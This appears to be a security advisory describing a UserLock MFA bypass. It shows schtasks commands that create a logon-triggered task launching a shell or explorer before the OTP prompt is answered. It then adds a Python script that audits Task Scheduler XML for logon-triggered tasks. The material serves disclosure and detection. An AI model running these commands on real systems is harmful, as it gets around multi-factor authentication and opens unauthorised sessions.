Vendor Homepage: https://www.isdecisions.com/products/userlock/help/#
Software: Tested with the UserLock 'Desktop agent', which protects interactive sessions on workstations and on terminal servers.
Description: UserLock is a multi-factor authentication solution for Windows Active Directory and cloud environments that stops unauthorized and unwanted access. It enables customized two-factor authentication (2FA) on Windows logon, Remote Desktop (RDP and RD Gateway), IIS, VPN and cloud applications. UserLock lets you apply MFA to Active Directory logons on domain-joined workstations and servers: at the user's first logon of the day to their workstation, a dialog box prompts for the OTP code from the authenticator app. UserLock integrates with the logon process to deliver two-factor authentication.
Task scheduling is one of the strategies most commonly used by threat actors to build persistence on a victim's computer. Adversaries frequently use it to evade automated detection, maintain persistence and carry out surprise attacks after long periods of lying low.
Vulnerability:
Create a scheduled task that executes at logon of any user.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"
After successfully logging on with domain credentials, the scheduled cmd.exe is started alongside the UserLock MFA dialog box, before the OTP code has been entered.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"
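Added here as a defender's check, not part of the original advisory: a Python audit over Task Scheduler XML (the format `schtasks /query /xml` prints, stored under C:\Windows\System32\Tasks, and embedded in Security event 4698) that lists every enabled logon-triggered task with the command it runs. The task names and XML below are constructed samples, not captures from a real host.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Namespace of the Task Scheduler XML format: what `schtasks /query /xml` prints,
# what lives under C:\Windows\System32\Tasks, and what Security event 4698
# (scheduled task created) embeds in its TaskContent field.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

@dataclass
class Finding:
    task_name: str
    user_id: str   # "" means the logon trigger fires for any user's logon
    command: str

def _text(node, path, default=""):
    return node.findtext(path, default=default, namespaces=NS)

def audit_logon_tasks(tasks: dict) -> list:
    """Report every task (name -> task XML) that has an enabled LogonTrigger.
    Such a task is started by the logon session itself, so its action runs
    whether or not the UserLock MFA dialog shown at that logon is answered."""
    findings = []
    for name, xml_text in tasks.items():
        root = ET.fromstring(xml_text)
        commands = [(_text(e, "t:Command") + " " + _text(e, "t:Arguments")).strip()
                    for e in root.findall("t:Actions/t:Exec", NS)]
        for trig in root.findall("t:Triggers/t:LogonTrigger", NS):
            if _text(trig, "t:Enabled", "true").lower() == "false":
                continue  # a disabled trigger never fires
            findings.append(Finding(name, _text(trig, "t:UserId"), "; ".join(commands)))
    return findings

# Constructed sample task definitions (not captured from a real host).
T = '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
SAMPLE_TASKS = {
    "MFA_Bypass_OnLogon": T + "<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger>"
        "</Triggers><Actions><Exec><Command>cmd.exe</Command><Arguments>/c powershell.exe"
        "</Arguments></Exec></Actions></Task>",
    "NightlyBackup": T + "<Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>"
        "<Actions><Exec><Command>C:\\Tools\\backup.exe</Command></Exec></Actions></Task>",
    "OldAgentCheck": T + "<Triggers><LogonTrigger><Enabled>false</Enabled><UserId>CONTOSO\\svc"
        "</UserId></LogonTrigger></Triggers><Actions><Exec><Command>agent.exe</Command>"
        "</Exec></Actions></Task>",
}

if __name__ == "__main__":
    for f in audit_logon_tasks(SAMPLE_TASKS):
        print(f"{f.task_name}: runs '{f.command}' at logon of {f.user_id or 'ANY USER'}")
```

Every enabled logon trigger is reported, not only suspiciously named ones, because each runs before the MFA gate and deserves review; an empty user_id marks the any-user case the advisory describes.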